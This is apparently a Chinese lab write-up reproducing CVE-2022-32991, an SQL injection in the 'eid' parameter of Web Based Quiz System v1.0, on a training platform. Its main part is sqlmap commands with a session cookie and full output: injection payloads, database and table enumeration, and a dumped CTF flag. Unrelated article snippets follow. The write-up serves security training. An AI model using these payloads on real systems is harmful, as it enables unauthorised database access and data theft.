Web Based Quiz System v1.0 SQL 注入漏洞(CVE-2022-32991)

前言

CVE-2022-32991 是一个影响 Web Based Quiz System v1.0 的 SQL 注入漏洞。这个漏洞存在于 welcome.php 文件中的 eid 参数处。攻击者可以通过此漏洞在数据库中执行任意 SQL 语句,从而获取、修改或删除数据库中的数据。

具体细节如下:

  • 攻击向量:网络(NETWORK)
  • 攻击复杂度:低(LOW)
  • 所需权限:低(LOW)
  • 用户交互:无(NONE)
  • 影响:高(机密性、完整性、可用性均受影响)

根据 CVSS v3 的评分,该漏洞的基础得分为 8.8(高),而在 CVSS v2 中,该漏洞的评分为 6.5(中)。这表明该漏洞在被利用时会对系统造成严重影响。

漏洞的主要原因是没有正确地对输入进行过滤和转义,从而使得恶意用户能够插入和执行恶意的 SQL 语句。为了防止这种类型的攻击,应确保在处理用户输入时使用预编译语句(prepared statements)或存储过程,并严格验证和转义所有用户输入。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

  1. 实战演练

    • 提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
    • 场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
  2. 漏洞复现

    • 用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
    • 通过实战操作,帮助用户掌握漏洞利用和防护的技能。
  3. 教学培训

    • 提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
    • 包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
  4. 竞赛与评测

    • 定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
    • 提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
  5. 资源共享

    • 平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
    • 用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Web Based Quiz System v1.0 是一个使用 PHP 和 MySQLi 构建的在线考试系统,旨在简化学生的考试过程并减少执行考试所需的人工。这套系统允许用户(学生)注册和登录,参加考试,而管理员则能够查看和管理用户、排名以及试题。

系统功能

管理员功能:

  • 首页
  • 查看用户
  • 管理测验
  • 查看排名

学生功能:

  • 注册
  • 登录
  • 参加测验
  • 查看分数
  • 查看排名
  • 注销

系统设置步骤

  1. 下载 zip 文件。
  2. 下载并安装 XAMPP。
  3. 运行 XAMPP 控制面板,启动 MySQL 和 Apache。
  4. 将下载的 zip 文件解压到 C:\xampp\htdocs 文件夹中。
  5. 打开浏览器并进入 http://localhost/phpmyadmin/ 创建数据库。
  6. 新建数据库命名为 sourcecodester_exam
  7. 导入 SQL 文件,选择 onlinequiz 文件夹中的相应文件。
  8. 点击 "Go" 进行导入。

运行系统

管理员账户访问路径为 http://localhost/onlinequiz/admin.php,默认用户名为 [email protected],密码为 admin。学生则可以通过 http://localhost/onlinequiz/ 进行注册和登录。

该系统主要用于教育目的,用户可以根据需求进行修改和扩展​ (NVD)​​ (SourceCodester)​。

漏洞复现

打开靶场

点击按钮注册

填写表格后提交 

使用刚注册的账号登录 

点击图中任意按钮跳转

发现了参数 eid(这三个页面的 eid 都不相同,最后两个页面的 n 和 t 相同)

打开 BurpSuite 拦截抓包

保存下值方便绕过身份验证

Cookie: PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

使用工具 SQLMap 开始渗透:

──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch --dbs_____H_____ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:03:02 /2024-06-29/[19:03:03] [INFO] testing connection to the target URL
[19:03:03] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:03:03] [INFO] testing if the target URL content is stable
[19:03:03] [INFO] target URL content is stable
[19:03:03] [INFO] heuristic (basic) test shows that GET parameter 'eid' might be injectable (possible DBMS: 'MySQL')
[19:03:03] [INFO] heuristic (XSS) test shows that GET parameter 'eid' might be vulnerable to cross-site scripting (XSS) attacks
[19:03:03] [INFO] testing for SQL injection on GET parameter 'eid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[19:03:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:03:04] [WARNING] reflective value(s) found and filtering out
[19:03:04] [INFO] GET parameter 'eid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="How")
[19:03:04] [INFO] testing 'Generic inline queries'
[19:03:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:03:04] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[19:03:04] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[19:03:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:03:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:03:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:03:05] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:03:05] [INFO] GET parameter 'eid' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[19:03:05] [INFO] testing 'MySQL inline queries'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:03:05] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                                
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:03:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[19:03:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[19:03:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:03:16] [INFO] GET parameter 'eid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:03:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:03:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:03:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:03:16] [INFO] target URL appears to have 5 columns in query
[19:03:16] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:03:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:03:16] [INFO] fetching database names
[19:03:17] [INFO] retrieved: 'information_schema'
[19:03:17] [INFO] retrieved: 'performance_schema'
[19:03:17] [INFO] retrieved: 'mysql'
[19:03:17] [INFO] retrieved: 'ctf'
available databases [4]:                                                                                                                                               
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema[19:03:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:03:17 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" --tables_____H_____ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:05:38 /2024-06-29/[19:05:38] [INFO] resuming back-end DBMS 'mysql' 
[19:05:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:05:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:05:39] [INFO] fetching tables for database: 'ctf'
[19:05:39] [WARNING] reflective value(s) found and filtering out
[19:05:39] [INFO] retrieved: 'user'
[19:05:39] [INFO] retrieved: 'options'
[19:05:39] [INFO] retrieved: 'quiz'
[19:05:40] [INFO] retrieved: 'admin'
[19:05:40] [INFO] retrieved: 'questions'
[19:05:40] [INFO] retrieved: 'history'
[19:05:40] [INFO] retrieved: 'rank'
[19:05:40] [INFO] retrieved: 'flag'
[19:05:40] [INFO] retrieved: 'answer'
Database: ctf                                                                                                                                                          
[9 tables]
+-----------+
| admin     |
| history   |
| options   |
| rank      |
| user      |
| answer    |
| flag      |
| questions |
| quiz      |
+-----------+[19:05:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:05:40 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" -T "flag" --columns_____H_____ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:06:22 /2024-06-29/[19:06:22] [INFO] resuming back-end DBMS 'mysql' 
[19:06:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:06:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:06:23] [INFO] fetching columns for table 'flag' in database 'ctf'
[19:06:23] [WARNING] reflective value(s) found and filtering out
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+[19:06:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:06:23 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" -T "flag" -C "flag" --dump_____H_____ ___[)]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:07:10 /2024-06-29/[19:07:10] [INFO] resuming back-end DBMS 'mysql' 
[19:07:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:07:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:07:10] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[19:07:10] [WARNING] reflective value(s) found and filtering out
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{7ba28499-362a-43b4-be35-1f92bae73ef5} |
+--------------------------------------------+[19:07:10] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[19:07:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'[*] ending @ 19:07:10 /2024-06-29/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/40588.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Es结合springboot(笔记回忆)

导包 <!--导入es--> <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-elasticsearch</artifactId> </dependency> <dependency><groupId>org.springframework.boot<…

【代码随想录】【算法训练营】【第53天】 [739]每日温度 [496]下一个更大元素I [503]下一个更大元素II

前言 思路及算法思维&#xff0c;指路 代码随想录。 题目来自 LeetCode。 day 48&#xff0c;周六&#xff0c;不能再坚持~ 题目详情 [739] 每日温度 题目描述 739 每日温度 解题思路 前提&#xff1a;寻找任一个元素的右边比自己大的元素的位置 思路&#xff1a;通常…

软信天成:您的数据仓库真的“达标”了吗?

在复杂多变的数据环境中&#xff0c;您的数据仓库是否真的“达标”了&#xff1f;本文将深入探讨数据仓库的定义、合格标准及其与数据库的区别&#xff0c;帮助您全面审视并优化您的数据仓库。 一、什么是数据仓库&#xff1f; 数据仓库是一个面向主题的、集成的、相对稳定的、…

一个R包完成单细胞基因集富集分析 (全代码)

singleseqgset是用于单细胞RNA-seq数据的基因集富集分析的软件包。它使用简单的基础统计量&#xff08;variance inflated Wilcoxon秩和检验&#xff09;来确定不同cluster中感兴趣的基因集的富集。 Installation library(devtools) install_github("arc85/singleseqgse…

iOS手机竖着拍的照片被旋转了90°的原因以及解决方案

EXIF.getData(IMG_FILE, function () { // IMG_FILE为图像数据 var orientation EXIF.getTag(this, “Orientation”); console.log(“Orientation:” orientation); // 拍照方向 }); 获取拍照方向的结果为1-8的数字&#xff1a; 注意&#xff1a;对于上面的八种方向中&a…

2024.7.4作业

1.梳理笔记(原创) 2. 终端输入一个日期&#xff0c;判断是这一年的第几天 scanf("%d-%d-%d",&y,&m,&d); 闰年2月29天&#xff0c;平年2月28天 #include <stdio.h> int main(int argc,const char *argv[]) { int y0,m0,d0,sum0,i0; …

数据库表导出到excel:前置知识1 ALL_TAB_COLS

ALL_TAB_COLS 当前用户可访问的表、视图和群集的列的相关信息 其中几个字段: OWNER&#xff1a;表&#xff0c;视图及群集的Owner   TABLE_NAME&#xff1a; 表&#xff0c;视图及聚簇的名称   COLUMN_NAME&#xff1a; 字段名   DATA_TYPE &#xff1a;字段的数据类型…

万字长文MySQL Binlog 详细指南

目录 第一阶段 MySQL Binlog 基础用法1. Binlog基本概念1.1 什么是Binlog1.2 Binlog的作用1.3 Binlog格式 2. 配置和管理Binlog2.1 开启Binlog2.2 设置Binlog文件大小和保留时间2.3 查看Binlog状态 3. Binlog的实际应用3.1 数据恢复3.2 主从复制3.3 审计 4. Binlog工具使用4.1 …

收银系统源码-收银台营销功能-购物卡

1. 功能描述 购物卡&#xff1a;基于会员的电子购物卡&#xff0c;支持设置时效、适用门店、以及可用商品&#xff1b;支持售卖和充值赠送&#xff0c;在收银台可以使用&#xff1b; 2.适用场景 会员充值赠送活动&#xff0c;例如会员充值1000元&#xff0c;赠送面值100元购…

145-四路16位125Msps AD FMC子卡模块

一、概述 该板卡可实现4路16bit 125Msps AD 功能&#xff0c;是xilinx开发板设计的标准板卡。FMC连接器是一种高速多pin的互连器件&#xff0c;广泛应用于板卡对接的设备中&#xff0c;特别是在xilinx公司的所有开发板中都使用。该AD&#xff0c;DA子卡模块就专门针对xilinx开发…

羊大师:羊奶养生,解锁健康之道的新密码

在探寻健康与养生的旅途中&#xff0c;我们总渴望找到那把开启健康之门的钥匙。而今&#xff0c;羊奶以其独特的营养价值和健康益处&#xff0c;正悄然成为那把解锁健康之道的新密码。 羊奶&#xff0c;自古以来便是自然赋予的珍贵礼物。它富含优质蛋白、多种维生素及矿物质&am…

nginx的重定向(rewrite)

1、location 匹配 location匹配的就是后面的URL&#xff0c;对访问的路径做访问控制或者代理转发 共有三个匹配&#xff1a;精确匹配、正则匹配、一般配 a、精确匹配 格式&#xff1a;location/ 对字符串进行完全匹配&#xff0c;必须完全合 c、正则匹配 ^~&#xff1a;前…

Android 抓取 CPU 资源信息

在 Android 开发中&#xff0c;使用 ADB&#xff08;Android Debug Bridge&#xff09;命令获取 CPU 资源信息有很多重要的作用。这些命令可以帮助开发者在多种情况下分析和优化应用性能、解决问题以及进行系统性调试。 以下列举一些 ABD 获取 CPU 资源信息的命令 获取 CPU 核…

Docker镜像加速配置

由于当前运营商网络问题&#xff0c;可能会导致您拉取 Docker Hub 镜像变慢&#xff0c;索引可以配置阿里云镜像加速器。阿里云登录 - 欢迎登录阿里云&#xff0c;安全稳定的云计算服务平台 每个人镜像地址都不一样&#xff0c;需要登陆阿里云自行查看&#xff0c;地址在上面&a…

SSM学生资助管理系统-计算机毕业设计源码30825

目 录 摘 要 1 绪论 1.1 研究背景 1.2研究意义 1.3论文结构与章节安排 2 学生资助管理系统分析 2.1 可行性分析 2.1.1 技术可行性分析 2.1.2 经济可行性分析 2.1.3 法律可行性分析 2.2 系统功能分析 2.2.1 功能性分析 2.2.2 非功能性分析 2.3 系统用例分析 2.4 …

Conmi的正确答案——ESP32-C3开启安全下载模式

IDF版本&#xff1a;4.4.7 注意事项&#xff1a;一旦烧录“安全下载模式”&#xff0c;模组将无法被读取或清理&#xff0c;只能通过eclipse原项目烧录程序进行重新烧录&#xff0c;无法再烧录其他固件。 20240703110201——追加解法&#xff0c;暂时无法解安全下载模式 &…

拓展欧几里得和裴蜀定理

裴蜀定理&#xff08;或贝祖定理&#xff09;说明了对任何整数a、b和它们的最大公约数d&#xff0c;关于未知数x和y的线性不定方程&#xff08;称为裴蜀等式&#xff09;&#xff1a;若a,b是整数,且gcd(a,b)d&#xff0c;那么对于任意的整数x,y,axby都一定是d的倍数&#xff0c…

SEO之快速网站诊断(二)

初创企业搭建网站的朋友看1号文章&#xff1b;想学习云计算&#xff0c;怎么入门看2号文章谢谢支持&#xff1a; 1、我给不会敲代码又想搭建网站的人建议 2、新手上云 &#xff08;接上一篇。。。。&#xff09; 4、外部链接 Google 的link:指令非常不准确&#xff0c;基本不…

【掌握C++ string 类】——【高效字符串操作】的【现代编程艺术】

专栏&#xff1a;C学习笔记 上一篇&#xff1a;【C】——【 STL简介】——【详细讲解】 1. 为什么要学习 string 类&#xff1f; 1.1 C 语言中的字符串 在 C 语言中&#xff0c;字符串是以 \0 结尾的字符集合。如下所示&#xff1a; #include <stdio.h>int main() {c…

Postman工具基本使用

一、安装及基本使用 安装及基本使用参见外网文档&#xff1a;全网最全的 postman 工具使用教程_postman使用-CSDN博客 建议版本&#xff1a;11以下&#xff0c;比如10.x.x版本。11版本以后貌似是必须登录使用 二、禁止更新 彻底禁止postman更新 - 简书 host增加&#xff1…